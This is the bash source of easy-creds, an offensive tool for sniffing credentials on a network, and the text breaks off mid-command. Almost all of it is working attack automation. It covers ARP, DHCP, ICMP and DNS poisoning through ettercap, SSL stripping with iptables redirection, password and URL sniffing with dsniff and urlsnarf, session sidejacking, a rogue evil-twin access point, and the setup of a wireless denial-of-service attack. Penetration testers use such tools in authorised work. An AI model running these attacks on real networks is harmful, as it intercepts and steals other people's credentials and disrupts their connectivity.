#!/bin/bash ################################################################################################################## # easy-creds is a simple bash script which makes sniffing networks for credentials a little easier. # # # # J0hnnyBrav0 (@Brav0hax) & help from al14s (@al14s) # ################################################################################################################## # v3.7.3 Garden of Your Mind - 12/11/2012 # # Copyright (C) 2012 Eric Milam # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public # License as published by the Free Software Foundation; either version 2 of the License, or any later version. # # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with this program; if not, write to the # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. ################################################################################################################## # #Clear some variables unset wireless unset etterlaunch unset offset unset eviltwin unset vercompare unset dosattack unset karmasploit unset x unset y #Save the starting location path location=$PWD #Find the ettercap version. Will be used for f_whichetter ettercapversion=$(ettercap -v|grep 2012|grep -o "") #Create the log folder in PWD if [ -z $1 ]; then logfldr=$PWD/easy-creds-$(date +%F-%H%M) mkdir -p $logfldr else logfldr=$1 fi # Catch ctrl-c input from user trap f_Quit 2 # # MISCELLANEOUS FUNCTIONS # ################################################## f_isxrunning(){ # Check to see if X is running if [ -z $(pidof X) ] && [ -z $(pidof Xorg) ]; then isxrunning= else isxrunning=1 fi # Uncomment the following line to launch attacks in a screen session instead of an xterm window. #unset isxrunning if [ -z $isxrunning ]; then echo -e "\n\e[1;31m[-] X Windows not detected, your attack will be launched in screen\e[0m\n" sleep 2 fi } ################################################## f_findpaths(){ # Grab the paths from the config file updatedb &> /dev/null easy_creds_config=$(locate easy-creds.paths) source $easy_creds_config } ################################################## f_xtermwindows(){ x="0" # x offset value y="0" # y offset value width="100" # width value height="7" # height value yoffset="120" # y offset } ################################################## f_checkexit(){ if [ -z $clean ]; then f_Quit else rm -rf /tmp/ec &> /dev/null clear exit 2> /dev/null fi } ################################################## f_Quit(){ echo -e "\n\n\e[1;33m[*] Please standby while we clean up your mess...\e[0m\n" sleep 3 if [ -e /tmp/ec/sslstrip.pid ]; then kill $(cat /tmp/ec/sslstrip.pid); fi if [ ! -z $(pidof hamster) ]; then kill $(pidof hamster); fi if [ ! -z $(pidof ferret) ]; then kill $(pidof ferret); fi if [ ! -z $(pidof ettercap) ]; then kill $(pidof ettercap); fi if [ ! -z $(pidof urlsnarf) ]; then kill $(pidof urlsnarf); fi if [ ! -z $(pidof dsniff) ]; then kill $(pidof dsniff); fi if [ ! -z $wireless ]; then kill $(pidof airbase-ng) $(pidof hamster) $(pidof ferret) $(cat /tmp/ec/tail.pid) if [ -e /tmp/ec/sleep.pid ]; then kill $(cat /tmp/ec/sleep.pid); fi service isc-dhcp-server stop &> /dev/null iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain #for $MONMODE in $(airmon-ng | grep mon | cut -f1); do #stop 'em all airmon-ng stop $MONMODE &> /dev/null #done fi echo "0" > /proc/sys/net/ipv4/ip_forward if [ ! -z $dosattack ] ; then airmon-ng stop $dosmon &> /dev/null airmon-ng stop $airomon &> /dev/null fi if [ ! -z $karmasploit ] ; then kill $(cat /tmp/ec/ec-karma-pid) &> /dev/null kill $(cat /tmp/ec/ec-metasploit-pid) &> /dev/null fi if [ ! -z $fra ]; then kill $(pidof radiusd) &> /dev/null kill $(pidof hostapd) &> /dev/null kill $(cat /tmp/ec/tail.pid) &> /dev/null kill $(cat /tmp/ec/tshark.pid) &> /dev/null mv $pathtoradiusconf/radiusd.conf.back $pathtoradiusconf/radiusd.conf mv $pathtoradiusconf/clients.conf.back $pathtoradiusconf/clients.conf echo "" > $freeradiuslog fi if [ "$mainchoice" == "5" ]; then clear rm -rf /tmp/ec exit 2> /dev/null fi rm -rf /tmp/ec bash $0 $logfldr kill $$ 2> /dev/null clean=1 } ################################################## # # PREREQ AND CONFIGURATION FUNCTIONS # ################################################## f_addtunnel(){ if [ -z $isxrunning ];then if [ -e /etc/default/isc-dhcp-server ]; then nano /etc/default/isc-dhcp-server elif [ -e /etc/sysconfig/dhcpd ]; then nano /etc/sysconfig/dhcpd else nano /etc/default/isc-dhcp-server fi else if [ -e /etc/default/isc-dhcp-server ]; then xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server & elif [ -e /etc/sysconfig/dhcpd ]; then xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/sysconfig/dhcpd & else xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server & fi fi f_prereqs } ################################################## f_nanoetter(){ if [ -z $isxrunning ];then nano /etc/etter.conf else xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter Conf" -e nano /etc/etter.conf & fi f_prereqs } ################################################## f_nanoetterdns(){ if [ -z $isxrunning ];then nano /usr/local/share/ettercap/etter.dns else xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter DNS" -e nano /usr/local/share/ettercap/etter.dns & fi f_prereqs } ################################################## f_dhcp3install(){ clear f_Banner echo -e "\e[1;33m[*] Installing dhcp-server, please stand by.\e[0m\n" if [ -e /etc/lsb-release ] || [ -e /etc/issue ]; then apt-get update &> /dev/null && apt-get install isc-dhcp-server &> /dev/null elif [ -e /etc/redhat-release ]; then yum install dhcp* &> /dev/null else echo -e "\e[1;31m[-] I can't determine your OS, please install isc-dhcp-server manually\e[0m" fi echo -e "\n\e[1;32m[+] Finished installing dhcp3-server.\e[0m\n" sleep 3 f_prereqs } ################################################## f_karmareqs(){ clear f_Banner echo -e "\e[1;33m[*] Installing Karmetasploit Prerequisites, please standby.\e[0m\n" gem install activerecord echo -e "\n\e[1;32m [+] Finished installing Karmetasploit Prerequisites.\e[0m\n" sleep 3 f_prereqs } ################################################## f_msfupdate(){ clear f_Banner echo -e "\e[1;33m[*] Updating the Metasploit Framework, please stand by.\e[0m\n" msfupdate echo -e "\n\e[1;32m [+] Finished updating the Metasploit Framework.\e[0m\n" sleep 3 f_prereqs } ################################################## f_aircrackupdate(){ clear f_Banner echo -e "\n\e[1;33m[*] Updating aircrack-ng from SVN, please be patient...\e[0m" svn co http://trac.aircrack-ng.org/svn/trunk/ /tmp/ec/aircrack-ng cd /tmp/ec/aircrack-ng/ make && make install > /dev/null echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n" sleep 2 echo -e "\e[1;33m[*] Updating airodump-ng OUI.\e[0m\n" bash $airodumppath/airodump-ng-oui-update > /dev/null echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n" sleep 3 cd $location f_prereqs } ################################################## f_sslstrip_vercheck(){ clear f_Banner echo -e "\n\e[1;33m[*] Checking the thoughtcrime website for the latest version of SSLStrip...\e[0m\n" #Get the installed version echo cat $sslstrippath/setup.py|grep version|cut -d "'" -f2 installedver=$(cat $sslstrippath/setup.py|grep version|cut -d "'" -f2) # Change to tmp folder to keep things clean then get the index.html from thoughtcrime.com for SSLStrip cd /tmp/ec wget -q http://www.thoughtcrime.org/software/sslstrip/index.html latestver=$(cat index.html | grep "cd sslstrip"| cut -d "-" -f2|cut -d "<" -f1) cd $location echo -e "\n\e[1;33m[*] Installed version of SSLStrip: $installedver\e[0m\n" echo -e "\nLatest version of SSLStrip: $latestver\n" if [ $(echo "$installedver < $latestver"|bc) == "1" ]; then echo -e "\n\e[1;33m[*] You have version\e[0m \e[1;31m$installedver\e[0m \e[1;33m installed, version\e[0m \e[1;32m$latestver\e[0m \e[1;33m is available.\e[0m\n" read -p "Would you like to install the latest version? [y/N]: " yn if [ $(echo ${yn} | tr 'A-Z' 'a-z') == 'y' ]; then f_sslstripupdate; fi else echo -e "\n\e[1;32m[+] Looks like you're running the latest version available.\e[0m \n" sleep 3 fi f_prereqs } ################################################## f_sslstripupdate(){ clear f_Banner echo -e "\n\e[1;31m[-] This will install SSLStrip from the thoughtcrime website, not the repositories.\e[0m\n\e[1;33m[*] Hit return to continue or ctrl-c to cancel and return to main menu.\e[0" read cp -R "$sslstrippath" /tmp/ec/sslstrip-$installedver echo -e "\n\e[1;33m[*] Downloading the tar file...\e[0m" cd /tmp/ec/ wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-$latestver.tar.gz echo -e "\n\e[1;33m[*] Installing the latest version of SSLStrip...\e[0m" tar -xvf sslstrip-$latestver.tar.gz mv -f /tmp/ec/sslstrip-$latestver $sslstrippath/sslstrip python $sslstrippath/setup.py install &> /dev/null cd $location echo -e "\n\e[1;32m[+] Version $latestver has been installed.\e[0m\n" sleep 2 } ################################################## f_howtos(){ xdg-open http://www.youtube.com/user/Brav0Hax/videos & f_prereqs } ################################################## f_pbs(){ xdg-open http://www.youtube.com/watch?v=OFzXaFbxDcM & f_mainmenu } ################################################## # # POISONING ATTACK FUNCTIONS # ################################################## f_getvics(){ read -p "Do you have a populated file of victims to use? [y/N]: " VICFILE if [ "$(echo ${VICFILE} | tr 'A-Z' 'a-z')" == "y" ]; then VICLIST= p= if [ -e /tmp/victims ]; then p="[/tmp/victims]"; fi while [ -z $VICLIST ]; do read -e -p "Path to the victim list file $p : " VICLIST if [ -z $VICLIST ] && [ -n $p ]; then VICLIST="/tmp/victims"; fi done else VICS= while [ -z $VICS ]; do read -p "IP address or range of IPs to poison (ettercap format): " VICS; done fi GW= p=$(route | grep default | awk '{print $2}') while [ -z $GW ]; do read -p "IP address of the gateway [$p] : " GW if [ -z $GW ];then GW=$p; fi done f_whichettercap } ################################################## f_whichettercap(){ if [ "$VICFILE" == "y" ]; then case $poisoningchoice in 2) etterlaunch=1 ;; 3) etterlaunch=3 ;; 5) etterlaunch=8 ;; esac else case $poisoningchoice in 2) etterlaunch=2 ;; 3) etterlaunch=4 ;; 5) etterlaunch=9 ;; esac fi } ################################################## f_HostScan(){ clear f_Banner range= while [ -z "$range" ]; do read -p "Enter your target network range (nmap format): " range; done echo -e "Performing an ARP scan to identify live devices - excluding our IPs.\n\nThis may take a bit.\n" #take our addresses out of the mix ;) myaddrs=$(printf "%s," $(ifconfig | grep "inet" | grep -v "" | awk '{print $2}' | sed 's/addr://g')) nmap -PR -n -sn $range --exclude $myaddrs -oN /tmp/ec/nmap.scan grep -e report -e MAC /tmp/ec/nmap.scan | sed '{ N; s/\n/ /; s/Nmap scan report for //g; s/MAC Address: //g; s/ (.\+//g; s/$/ -/; }' > /tmp/victims echo -e "\n\e[1;33m[*] Your victim host list is at /tmp/victims.\e[0m\n" echo -e "\n\e[1;31m[-] Remember to remove any IPs that should not be poisoned!\e[0m\n" read -p "Would you like to edit the victim host list? [y/N] : " yn if [ $(echo $yn | tr 'A-Z' 'a-z') == "y" ]; then if [ -z $isxrunning ];then nano /tmp/victims else xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Victims List" -e nano /tmp/victims & fi fi f_poisoning } ################################################## f_setup(){ echo -e "Network Interfaces:\n" ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n' IFACE= while [ -z $IFACE ]; do read -p "Interface connected to the network (ex. eth0): " IFACE done echo -e "\n\n\e[1;33m[*] Setting up iptables to handle traffic routing...\e[0m\n" iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 sleep 3 f_xtermwindows } ################################################## f_Standard(){ clear f_Banner f_setup f_getvics f_finalstage f_mainmenu } ################################################## f_Oneway(){ clear f_Banner f_setup f_getvics f_finalstage f_mainmenu } ################################################## f_DHCPPoison(){ clear f_Banner f_setup etterlaunch=5 POOL= while [ -z "$POOL" ]; do read -p "Pool of IP address to assign to your victims: " POOL; done MASK= while [ -z "$MASK" ]; do read -p "Netmask to assign to your victims: " MASK; done DNS= while [ -z "$DNS" ]; do read -p "DNS IP to assign to your victims: " DNS; done f_finalstage f_mainmenu } ################################################## f_DNSPoison(){ clear f_Banner f_setup f_getvics f_finalstage f_mainmenu } ################################################## f_ICMPPoison(){ clear f_Banner f_setup etterlaunch=6 GATEMAC= while [ -z "$GATEMAC" ]; do read -p "MAC address of the gateway: " GATEMAC; done GATEIP= while [ -z "$GATEIP" ]; do read -p "IP address of the gateway: " GATEIP; done f_finalstage f_mainmenu } ################################################## f_sidejack(){ echo -e "\n\e[1;33m[*] Starting Hamster & Ferret...\e[0m\n" cd $logfldr screen -dmS SideJack -t ferret bash -c "$ferretpath/ferret -i $IFACE" sleep 2 screen -S SideJack -t hamster -X screen $hamsterpath/hamster cd $location sleep 2 echo -e "\n\e[1;33m[*] Run firefox and type http://hamster\e[0m\n" echo -e "\e[1;33m[*] Don't forget to set the proxy to\e[0m\n" sleep 5 } ################################################## f_ecap(){ echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n" y=$(($y+$yoffset)) case $etterlaunch in 1) type="[arp:remote]" c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;; 2) type="[arp:remote]" c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;; 3) type="[arp:oneway]" c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE // /$GW/" ;; 4) type="[arp:oneway]" c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS/ /$GW/" ;; 5) type="[dhcp:$POOL/$MASK/$DNS/]" c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;; 6) type="[icmp:$GATEMAC/$GATEIP]" c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;; 7) type="[tunnel]" c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE // //" ;; 8) type="[dns_spoof / arp]" c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;; 9) type="[dns_spoof / arp]" c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;; esac if [ ! -z $isxrunning ]; then xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c & else screen -S easy-creds -t ettercap -X screen $c fi ecpid=$(pidof ettercap) } ################################################## f_ecap_assimilation(){ #Used if version of ettercap is 0.7.5 and above. Target specification format changed for IPv6 echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n" y=$(($y+$yoffset)) case $etterlaunch in 1) type="[arp:remote]" c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;; 2) type="[arp:remote]" c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;; 3) type="[arp:oneway]" c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /// /$GW//" ;; 4) type="[arp:oneway]" c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS// /$GW//" ;; 5) type="[dhcp:$POOL/$MASK/$DNS/]" c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;; 6) type="[icmp:$GATEMAC/$GATEIP]" c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;; 7) type="[tunnel]" c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE /// ///" ;; 8) type="[dns_spoof / arp]" c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;; 9) type="[dns_spoof / arp]" c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;; esac if [ ! -z $isxrunning ]; then xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c & else screen -S easy-creds -t ettercap -X screen $c fi ecpid=$(pidof ettercap) } ################################################## # # FAKE AP ATTACK FUNCTIONS # ################################################## f_fakeapAttack(){ wireless=1 offset=1 # Credit to Lucafa's post on the Offensive-Security forums, used as a base clear f_Banner f_xtermwindows SIDEJACK= read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')" echo -e "Network Interfaces:\n" ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n' IFACE= while [ -z "$IFACE" ]; do read -p "Interface connected to the internet (ex. eth0): " IFACE; done wirelesscheck=$(airmon-ng | grep 'wlan') if [ ! -z "$wirelesscheck" ]; then airmon-ng else echo -e "\n\e[1;31m[-] I can't find a wireless interface to display...continuing anyway\e[0m\n" sleep 5 fi WIFACE= while [ -z "$WIFACE" ]; do read -p "Wireless interface name (ex. wlan0): " WIFACE; done if [ -z $eviltwin ]; then ESSID= while [ -z "$ESSID" ]; do read -p "ESSID you would like your rogue AP to be called, example FreeWiFi: " ESSID; done CHAN= while [ -z "$CHAN" ]; do read -p "Channel you would like to broadcast on: " CHAN; done airmon-ng start $WIFACE $CHAN &> /dev/null elif [ "$eviltwin" == "1" ]; then airmon-ng start $WIFACE &> /dev/null fi modprobe tun echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n" airmon-ng | grep mon | sed '$a\\n' MONMODE= while [ -z "$MONMODE" ]; do read -p "Enter your monitor enabled interface name, (ex: mon0): " MONMODE; done TUNIFACE= while [ -z "$TUNIFACE" ]; do read -p "Enter your tunnel interface, example at0: " TUNIFACE; done read -p "Do you have a dhcpd.conf file to use? [y/N]: " DHCPFILE DHCPFILE=$(echo $DHCPFILE | tr 'A-Z' 'a-z') if [ "$DHCPFILE" == "y" ]; then f_dhcpconf else f_dhcpmanual fi f_dhcptunnel } ################################################## f_dhcpconf(){ dhcpdconf= if [ -d /etc/dhcp]; then #Ubuntu/Debian dhcp3-server dhcpdconf="/etc/dhcp/dhcpd.conf" elif [ -e /etc/dhcpd.conf ]; then #redhat/fedora old dhcpdconf="/etc/dhcpd.conf" else dhcpdconf="/etc/dhcp/dhcpd.conf" #Ubuntu/Debian/RH/Fedora isc-dhcp-server fi valid= while [[ $valid != 1 ]]; do read -e -p "Path to the dhcpd.conf file [$dhcpdconf]: " DHCPPATH if [ -z "$DHCPPATH" ]; then DHCPPATH=$dhcpdconf; fi if [ ! -f "$DHCPPATH" ]; then echo -e "File not found - $DHCPPATH\n" else valid=1 fi done cat $DHCPPATH > /tmp/ec/dhcpd.conf mv /tmp/ec/dhcpd.conf $dhcpdconf DHCPPATH=$dhcpdconf #If your DHCP conf file is setup properly, this will work, otherwise you need to tweak it ATNET=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f2) ATIP=$(cat $DHCPPATH |grep -i "option routers"|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATSUB=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f4) ATCIDR=$(ipcalc -b $ATNET/$ATSUB|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\/[0-9]\{1,2\}') } ################################################## f_ipcalc(){ dhcpdconf= if [ -d /etc/dhcp ]; then dhcpdconf="/etc/dhcp/dhcpd.conf" elif [ -e /etc/sysconfig/dhcpd ]; then dhcpdconf="/etc/dhcpd.conf" else dhcpdconf="/etc/dhcp/dhcp.conf" fi DHCPPATH=$dhcpdconf #use ipcalc to complete the DHCP setup ipcalc "$ATCIDR" > /tmp/ec/atcidr ATNET=$(cat /tmp/ec/atcidr|grep Address| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATIP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATSUB=$(cat /tmp/ec/atcidr|grep Netmask| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATBROAD=$(cat /tmp/ec/atcidr|grep Broadcast| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATLSTARTTMP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3) ATLSTART=$(echo $ATLSTARTTMP.100) ATLENDTMP=$(cat /tmp/ec/atcidr|grep HostMax| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3) ATLEND=$(echo $ATLENDTMP.200) echo -e "\n\n\e[1;33m[*] Creating a dhcpd.conf to assign addresses to clients that connect to us.\e[0m" echo "ddns-update-style none;" > $DHCPPATH echo "authoritative;" >> $DHCPPATH echo "log-facility local7;" >> $DHCPPATH echo "subnet $ATNET netmask $ATSUB {" >> $DHCPPATH echo " range $ATLSTART $ATLEND;" >> $DHCPPATH echo " option domain-name-servers $ATDNS;" >> $DHCPPATH echo " option routers $ATIP;" >> $DHCPPATH echo " option broadcast-address $ATBROAD;" >> $DHCPPATH echo " default-lease-time 600;" >> $DHCPPATH echo " max-lease-time 7200;" >> $DHCPPATH echo "}" >> $DHCPPATH } ################################################## f_dhcpmanual(){ ATCIDR= while [ -z "$ATCIDR" ]; do read -p "Network range for your tunneled interface, example " ATCIDR if [[ ! $ATCIDR =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}$ ]]; then ATCIDR=; fi done ATDNS= while [ -z "$ATDNS" ]; do read -p "Enter the IP address for the DNS server, example " ATDNS; done f_ipcalc } ################################################## f_dhcptunnel(){ etterlaunch=7 # airbase-ng is going to create our fake AP with the SSID we specified echo -e "\n\e[1;33m[*] Launching Airbase with your settings.\e[0m" if [ "$eviltwin" == "1" ] && [ -z $isxrunning ]; then screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e "$ESSID" $MONMODE elif [ "$eviltwin" == "1" ] && [ ! -z $isxrunning ]; then xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "$ESSID" $MONMODE & elif [ -z $isxrunning ]; then screen -dmS easy-creds -t Airbasg-NG airbase-ng -e "$ESSID" -c $CHAN $MONMODE else xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -e "$ESSID" -c $CHAN $MONMODE & fi sleep 7 echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m" ifconfig "$TUNIFACE" up ifconfig "$TUNIFACE" "$ATIP" netmask "$ATSUB" ifconfig "$TUNIFACE" mtu 1500 route add -net "$ATNET" netmask "$ATSUB" gw "$ATIP" dev "$TUNIFACE" sleep 2 echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m" iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 sleep 2 echo -e "\n\e[1;33m[*] Launching Tail.\e[0m" if [ -z $isxrunning ]; then screen -S easy-creds -t DMESG -X tail -f /var/log/messages else y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages & fi echo $! > /tmp/ec/tail.pid sleep 3 echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n" if [ -e /etc/dhcp/dhcpd.conf ]; then dhcpd -q -cf $DHCPPATH -pf /var/run/isc-dhcp-server/dhcpd.pid $TUNIFACE & elif [ -e /etc/sysconfig/dhcpd ]; then systemctl start dhcpd.service else service dhcpd start fi sleep 3 f_finalstage f_mainmenu } ################################################## f_finalstage(){ if [ -z $wireless ]; then read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')" fi if [ "$etterlaunch" -lt "8" ];then if [ ! -z $isxrunning ]; then echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n" if [ "$offset" == "1" ]; then y=$(($y+$yoffset)) fi sslstripfilename=sslstrip$(date +%F-%H%M).log xterm -geometry "$width"x$height-$x+$y -bg blue -fg white -T "SSLStrip" -e sslstrip -pfk -w $logfldr/$sslstripfilename & else echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n" sslstripfilename=sslstrip$(date +%F-%H%M).log screen -dmS easy-creds -t sslstrip -pfk -w $logfldr/$sslstripfilename fi fi echo $! > /tmp/ec/sslstrip.pid sleep 2 if [ -z "$ettercapversion" ]; then f_ecap else f_ecap_assimilation fi sleep 3 echo -e "\n\e[1;33m[*] Configuring IP forwarding...\e[0m\n" echo "1" > /proc/sys/net/ipv4/ip_forward sleep 3 echo -e "\n\e[1;33m[*] Launching URLSnarf...\e[0m\n" if [ "$wireless" == "1" ]; then y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i $TUNIFACE & sleep 3 elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $TUNIFACE elif [ -z $wireless ] && [ -z $isxrunning ]; then screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $IFACE screen -S easy-creds -X select 2 screen -S easy-creds -X logfile $logfldr/urlsnarf-$(date +%F-%H%M).txt screen -S easy-creds -X log else y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i $IFACE & sleep 3 fi echo -e "\n\e[1;33m[*] Launching Dsniff...\e[0m\n" if [ "$wireless" == "1" ]; then y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log & sleep 3 elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then screen -S easy-creds -t dsniff -X screen dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log elif [ -z $wireless ] && [ -z $isxrunning ]; then screen -S easy-creds -t dsniff -X screen dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log else y=$(($y+$yoffset)) xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log & sleep 3 fi if [ "$SIDEJACK" == "y" ]; then f_sidejack fi echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m" sleep 5 } ################################################## f_fakeapeviltwin(){ eviltwin=1 ESSID=default f_fakeapAttack } ################################################## f_mdk3aps(){ clear f_Banner dosattack=1 # grep the MACs to a temp white list ifconfig -a| grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst echo read -p "Do you have the BSSID address of the AP you'd like to attack? [y/N]: " havemac havemac="$(echo ${havemac} | tr 'A-Z' 'a-z')" echo if [ "$havemac" == "y" ]; then dosmac= while [ -z "$dosmac" ]; do read -p "Please enter the BSSID address of the AP you wish to DoS: " dosmac; done echo "$dosmac" > /tmp/ec/ec-dosap airmon-ng | egrep 'wlan|ath' | sed '$a\\n' doswlan= while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;") echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack." airmon-ng start $doswlan & sleep 3 dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1) echo -e "\nUsing $dosmon for the attack.\n\n" echo -e "\n\e[1;33m[*] Please stand by while we DoS the AP with BSSID Address $dosmac...\e[0m" sleep 3 if [ -z $isxrunning ]; then screen -S 